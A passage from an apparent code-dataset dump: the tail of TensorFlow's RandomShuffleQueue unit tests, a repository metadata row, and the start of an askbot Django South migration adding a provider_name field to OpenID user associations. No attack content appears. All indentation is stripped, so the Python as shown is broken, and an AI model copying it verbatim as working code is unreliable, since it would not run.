1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpToRandomPartition(self):
with self.test_session() as sess:
dequeue_sizes = [random.randint(50, 150) for _ in xrange(10)]
total_elements = sum(dequeue_sizes)
q = data_flow_ops.RandomShuffleQueue(
total_elements, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in xrange(total_elements)]
enqueue_op = q.enqueue_many((elems,))
dequeue_ops = [q.dequeue_up_to(size) for size in dequeue_sizes]
enqueue_op.run()
# Dequeue random number of items in parallel on 10 threads.
dequeued_elems = []
def dequeue(dequeue_op):
dequeued_elems.extend(sess.run(dequeue_op))
threads = []
for dequeue_op in dequeue_ops:
threads.append(self.checkedThread(target=dequeue, args=(dequeue_op,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueUpToWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesUpTo
# that number of elements.
dequeued_t = q.dequeue_up_to(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
dequeued_t.eval()
def testBlockingDequeueFromClosedQueue(self):
with self.test_session() as sess:
min_size = 2
q = data_flow_ops.RandomShuffleQueue(10, min_size, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
results = []
# Manually dequeue until we hit min_size.
results.append(sess.run(dequeued_t))
results.append(sess.run(dequeued_t))
def blocking_dequeue():
results.append(sess.run(dequeued_t))
results.append(sess.run(dequeued_t))
self.assertItemsEqual(elems, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=blocking_dequeue)
dequeue_thread.start()
time.sleep(0.1)
# The dequeue thread blocked when it hit the min_size requirement.
self.assertEqual(len(results), 2)
close_op.run()
dequeue_thread.join()
# Once the queue is closed, the min_size requirement is lifted.
self.assertEqual(len(results), 4)
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
finished = [] # Needs to be a mutable type
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
finished.append(True)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(finished), 0)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
progress = [] # Must be mutable
def dequeue():
self.assertItemsEqual(elems, sess.run(dequeued_t))
progress.append(1)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
progress.append(2)
self.assertEqual(len(progress), 0)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
for _ in range(100):
time.sleep(0.01)
if len(progress) == 1:
break
self.assertEqual(len(progress), 1)
time.sleep(0.01)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(progress), 2)
def testBlockingDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEquals(3, len(results))
results.extend(sess.run(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueUpToSmallerThanMinAfterDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
capacity=10,
min_after_dequeue=2,
dtypes=dtypes_lib.float32,
shapes=((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEquals(3, len(results))
# min_after_dequeue is 2, we ask for 3 elements, and we end up only
# getting the remaining 1.
results.extend(sess.run(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue_many(q.size())
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEqual(len(results), 3)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
# While the last dequeue failed, we want to insure that it returns
# any elements that it potentially reserved to dequeue. Thus the
# next cleanup should return a single element.
results.extend(sess.run(cleanup_dequeue_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(results), 4)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 4, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0], results)
# There wasn't room for 50.0 in the queue when the first element was
# dequeued.
self.assertNotEqual(50.0, results[0])
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
thread.join()
def testBlockingEnqueueToClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed since it will complete
# before the queue is closed.
sess.run(blocking_enqueue_op)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
sess.run(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the first blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def blocking_close():
sess.run(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Wait for the close op to block before unblocking the enqueue.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
# Dequeue to unblock the first blocking_enqueue_op, after which the
# close will complete.
results.append(dequeued_t.eval())
self.assertTrue(results[0] in elems)
thread2.join()
thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
size_t = q.size()
enqueue_op.run()
self.assertEqual(size_t.eval(), 3)
def blocking_enqueue():
# This will block until the dequeue after the close.
sess.run(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# First blocking_enqueue_op of blocking_enqueue has enqueued 1 of 2
# elements, and is blocked waiting for one more element to be dequeue.
for i in range(50):
queue_size = size_t.eval()
if queue_size == 4:
break
elif i == 49:
self.fail(
"Blocking enqueue op did not execute within the expected time.")
time.sleep(0.1)
def blocking_close():
sess.run(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Unblock the first blocking_enqueue_op in blocking_enqueue.
q.dequeue().eval()
thread2.join()
thread1.join()
# At this point the close operation will complete, so the next enqueue
# will fail.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
sess.run(blocking_enqueue_op)
def testSharedQueueSameSession(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
# TensorFlow TestCase adds a default graph seed (=87654321). We check if
# the seed computed from the default graph seed is reproduced.
seed = 887634792
q2 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=seed)
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q2.dequeue().eval(), 10.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q1.dequeue().eval(), 20.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
def testSharedQueueSameSessionGraphSeedNone(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=98765432)
q1.enqueue((10.0,)).run()
# If both graph and op seeds are not provided, the default value must be
# used, and in case a shared queue is already created, the second queue op
# must accept any previous seed value.
random_seed.set_random_seed(None)
q2 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
def testIncompatibleSharedQueueErrors(self):
with self.test_session():
q_a_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.RandomShuffleQueue(
15, 5, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.RandomShuffleQueue(
10, 0, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("min_after_dequeue"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_d")
q_d_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
q_f_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_f_2.queue_ref.op.run()
q_g_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_g")
q_g_2 = data_flow_ops.RandomShuffleQueue(
10, 5, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_g")
q_g_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_g_2.queue_ref.op.run()
q_h_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=12, shared_name="q_h")
q_h_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=21, shared_name="q_h")
q_h_1.queue_ref.op.run()
with self.assertRaisesOpError("random seeds"):
q_h_2.queue_ref.op.run()
def testSelectQueue(self):
with self.test_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
q2 = data_flow_ops.RandomShuffleQueue(15, 0, dtypes_lib.float32)
enq_q = data_flow_ops.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_many_op)
def _blockingDequeueUpTo(self, sess, dequeue_up_to_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_up_to_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.test_session() as sess:
q_empty = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, (
(),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
dequeue_up_to_op = q_empty.dequeue_up_to(1)
q_full = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingDequeueUpTo, args=(sess, dequeue_up_to_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testDequeueManyInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_many(5)
deq2 = q2.dequeue_many(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueUpToInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_up_to(5)
deq2 = q2.dequeue_up_to(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue()
deq2 = q2.dequeue()
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
for _ in range(5):
results[0].append(deq1.eval())
results[1].append(deq2.eval())
q1.close().run()
q2.close().run()
for _ in range(5):
results[2].append(deq1.eval())
results[3].append(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testBigEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
sess.run(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(2, 0, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(sess.run(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
sess.run(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertItemsEqual(elem, results)
if __name__ == "__main__":
test.main()
| apache-2.0 |
jesonyang001/qarepo | askbot/deps/django_authopenid/migrations/0002_make_multiple_openids_possible.py | 17 | 9274 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
from askbot.migrations import houston_do_we_have_a_problem
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'UserAssociation.provider_name'
db.add_column('django_authopenid_userassociation', 'provider_name', self.gf('django.db.models.fields.CharField')(default='unknown', max_length=64), keep_default=False)
# Removing unique constraint on 'UserAssociation', fields ['user']
if houston_do_we_have_a_problem('django_authopenid_userassociation'):
# In MySQL+InnoDB Foreign keys have to have some index on them,
# therefore before deleting the UNIQUE index we have to create an "ordinary" one
db.create_index('django_authopenid_userassociation', ['user_id'])
db.delete_unique('django_authopenid_userassociation', ['user_id'])
# Adding unique constraint on 'UserAssociation', fields ['provider_name', 'user']
db.create_unique('django_authopenid_userassociation', ['provider_name', 'user_id'])
def backwards(self, orm):
# Deleting field 'UserAssociation.provider_name'
db.delete_column('django_authopenid_userassociation', 'provider_name')
# Adding unique constraint on 'UserAssociation', fields ['user']
db.create_unique('django_authopenid_userassociation', ['user_id'])
# Removing unique constraint on 'UserAssociation', fields ['provider_name', 'user']
db.delete_unique('django_authopenid_userassociation', ['provider_name', 'user_id'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'about': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
